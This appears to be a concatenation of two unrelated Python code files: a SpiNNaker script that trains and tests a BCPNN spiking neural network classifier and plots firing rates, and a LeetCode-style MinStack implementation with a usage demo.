def train():
# SpiNNaker setup
sim.setup(timestep=1.0, min_delay=1.0, max_delay=10.0, spinnaker_hostname="192.168.1.1")
# Generate orthogonal input stimuli
orthogonal_stimuli_rates = []
num_inputs = len(INPUT_NAMES)
for i in range(num_inputs):
input_stimuli = []
for s in range(TRAINING_TIME / TRAINING_STIMULUS_TIME):
input_stimuli.append(MIN_FREQUENCY if (s % num_inputs) == i else MAX_FREQUENCY)
orthogonal_stimuli_rates.append(input_stimuli)
# Build basic network with orthogonal stimulation of both populations
input_populations, class_populations = build_basic_network(orthogonal_stimuli_rates, TRAINING_STIMULUS_TIME,
orthogonal_stimuli_rates, TRAINING_STIMULUS_TIME,
False, 0.0, True, sim)
# Create BCPNN model with weights disabled
bcpnn_synapse = bcpnn.BCPNNSynapse(
tau_zi=BCPNN_TAU_PRIMARY,
tau_zj=BCPNN_TAU_PRIMARY,
tau_p=BCPNN_TAU_ELIGIBILITY,
f_max=MAX_FREQUENCY,
w_max=BCPNN_MAX_WEIGHT,
weights_enabled=False,
plasticity_enabled=True,
weight=0.0)
# Create all-to-all conector to connect inputs to classes
input_class_connector = sim.AllToAllConnector()
# Loop through all pairs of input populations and classes
plastic_connections = []
for (i, c) in itertools.product(input_populations, class_populations):
# Connect input to class with all-to-all plastic synapse
connection = sim.Projection(i, c, input_class_connector, bcpnn_synapse,
receptor_type="excitatory", label="%s-%s" % (i.label, c.label))
plastic_connections.append(connection)
# Run simulation
sim.run(TRAINING_TIME)
# Plot bias evolution
num_classes = len(CLASS_NAMES)
#bias_figure, bias_axes = pylab.subplots()
# **HACK** Extract learnt biases from gsyn channel
learnt_biases = []
plotting_times = range(TRAINING_TIME)
for i, c in enumerate(class_populations):
# Read bias from class
bias = c.get_data().segments[0].filter(name="bias")[0]
'''
# Loop through plotting times to get mean biases
mean_pj = []
for t in plotting_times:
# Slice out the rows for all neurons at this time
time_rows = gsyn[t::TRAINING_TIME]
time_bias = zip(*time_rows)[2]
mean_pj.append(numpy.average(numpy.exp(numpy.divide(time_bias,BCPNN_PHI))))
bias_axes.plot(plotting_times, mean_pj, label=c.label)
'''
# Add final bias column to list
# **HACK** investigate where out by 1000 comes from!
learnt_biases.append(bias[-1,:] * 0.001)
'''
bias_axes.set_title("Mean final bias")
bias_axes.set_ylim((0.0, 1.0))
bias_axes.set_ylabel("Pj")
bias_axes.set_xlabel("Time/ms")
bias_axes.legend()
'''
# Plot weights
weight_figure, weight_axes = pylab.subplots(num_inputs, num_classes)
# Loop through plastic connections
learnt_weights = []
for i, c in enumerate(plastic_connections):
# Extract weights and calculate mean
weights = c.get("weight", format="array")
mean_weight = numpy.average(weights)
# Add weights to list
learnt_weights.append(weights)
# Plot mean weight in each panel
axis = weight_axes[i % num_inputs][i / num_classes]
axis.matshow([[mean_weight]], cmap=pylab.cm.gray)
#axis.set_title("%s: %fuS" % (c.label, mean_weight))
axis.set_title("%u->%u: %f" % (i % num_inputs, i / num_classes, mean_weight))
axis.get_xaxis().set_visible(False)
axis.get_yaxis().set_visible(False)
# Show figures
pylab.show()
# End simulation on SpiNNaker
sim.end()
# Return learnt weights
return learnt_weights, learnt_biases
#-------------------------------------------------------------------
# Test trained network
#-------------------------------------------------------------------
def test(learnt_weights, learnt_biases):
# SpiNNaker setup
sim.setup(timestep=1.0, min_delay=1.0, max_delay=10.0, spinnaker_hostname="192.168.1.1")
# Generate testing stimuli patters
testing_stimuli_rates = [
[MAX_FREQUENCY, MIN_FREQUENCY, MAX_FREQUENCY, MIN_FREQUENCY],
[MIN_FREQUENCY, MAX_FREQUENCY, MAX_FREQUENCY, MIN_FREQUENCY],
]
# Generate uncertain class stimuli pattern
uncertain_stimuli_rates = [
[MAX_FREQUENCY * 0.5],
[MAX_FREQUENCY * 0.5],
]
# Build basic network
input_populations, class_populations = build_basic_network(testing_stimuli_rates, TESTING_STIMULUS_TIME,
uncertain_stimuli_rates, TESTING_TIME,
True, learnt_biases, False, sim)
# Create BCPNN model with weights disabled
bcpnn_synapse = bcpnn.BCPNNSynapse(
tau_zi=BCPNN_TAU_PRIMARY,
tau_zj=BCPNN_TAU_PRIMARY,
tau_p=BCPNN_TAU_ELIGIBILITY,
f_max=MAX_FREQUENCY,
w_max=BCPNN_MAX_WEIGHT,
weights_enabled=True,
plasticity_enabled=False)
for ((i, c), w) in zip(itertools.product(input_populations, class_populations), learnt_weights):
# Convert learnt weight matrix into a connection list
connections = convert_weights_to_list(w, 1.0, 7.0)
# Create projections
sim.Projection(i, c, sim.FromListConnector(connections), bcpnn_synapse,
receptor_type="excitatory", label="%s-%s" % (i.label, c.label))
# Run simulation
sim.run(TESTING_TIME)
# Read spikes from input and class populations
input_data = [i.get_data() for i in input_populations]
class_data = [c.get_data() for c in class_populations]
# End simulation on SpiNNaker
sim.end()
# Return spikes
return input_data, class_data
def plot_spiketrains(axis, segment, offset, **kwargs):
for spiketrain in segment.spiketrains:
y = numpy.ones_like(spiketrain) * (offset + spiketrain.annotations["source_index"])
axis.scatter(spiketrain, y, **kwargs)
def calculate_rate(segment, rate_bins, population_size):
population_histogram = numpy.zeros(len(rate_bins) - 1)
for spiketrain in segment.spiketrains:
population_histogram += numpy.histogram(spiketrain, bins=rate_bins)[0]
return population_histogram * (1000.0 / 500.0) * (1.0 / float(population_size))
#-------------------------------------------------------------------
# Experiment
#-------------------------------------------------------------------
# Train model and get weights
'''
learnt_weights, learnt_biases = train()
numpy.save("learnt_weights.npy", learnt_weights)
numpy.save("learnt_biases.npy", learnt_biases)
'''
learnt_weights = numpy.load("learnt_weights.npy")
learnt_biases = list(numpy.load("learnt_biases.npy"))
input_data, class_data = test(learnt_weights, learnt_biases)
'''
for l, s in input_spike_lists:
s.save("input_spikes_%s.dat" % l)
for l, s in class_spike_lists:
s.save("class_spikes_%s.dat" % l)
'''
figure, axes = pylab.subplots(len(INPUT_NAMES) + len(CLASS_NAMES))
rate_bins = numpy.arange(0, TESTING_TIME + 1, 500)
for d, n, a in zip(input_data, INPUT_NAMES, axes[:len(INPUT_NAMES)]):
rates = calculate_rate(d.segments[0], rate_bins, CLASS_POP_SIZE)
#plot_spiketrains(a, d.segments[0], 0.0)
a.plot(rate_bins[:-1], rates, color="red")
a.set_ylim((0, 40.0))
a.axhline(MAX_FREQUENCY, color="grey", linestyle="--")
a.set_title(n)
for d, n, a in zip(class_data, CLASS_NAMES, axes[len(INPUT_NAMES):]):
rates = calculate_rate(d.segments[0], rate_bins, CLASS_POP_SIZE)
#plot_spiketrains(a, d.segments[0], 0.0)
a.plot(rate_bins[:-1], rates, color="blue")
a.set_ylim((0, 40.0))
a.axhline(MAX_FREQUENCY, color="grey", linestyle="--")
a.set_title(n)
# Show figures
pylab.show()
|
""" Design a stack that supports push, pop, top, and retrieving the minimum element in constant time.
push(x) -- Push element x onto stack.
pop() -- Removes the element on top of the stack.
top() -- Get the top element.
getMin() -- Retrieve the minimum element in the stack.
Example 1:
Input
["MinStack","push","push","push","getMin","pop","top","getMin"]
[[],[-2],[0],[-3],[],[],[],[]]
Output
[null,null,null,null,-3,null,0,-2]
Explanation
MinStack minStack = new MinStack();
minStack.push(-2);
minStack.push(0);
minStack.push(-3);
minStack.getMin(); // return -3
minStack.pop();
minStack.top(); // return 0
minStack.getMin(); // return -2
"""
class MinStack:
def __init__(self):
"""
initialize your data structure here.
"""
self.items = []
def push(self, x: int) -> None:
if not self.items:
self.items.append((x,x))
else:
self.items.append((x, min(x,self.items[-1][-1])))
def pop(self) -> None:
if self.items:
self.items.pop()
def top(self) -> int:
if not self.items:
return None
return self.items[-1][0]
def getMin(self) -> int:
if not self.items:
return None
return self.items[-1][-1]
obj = MinStack()
obj.push(-2)
obj.push(0)
obj.push(-3)
print(obj.getMin())
obj.pop()
print(obj.top())
print(obj.getMin()) |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.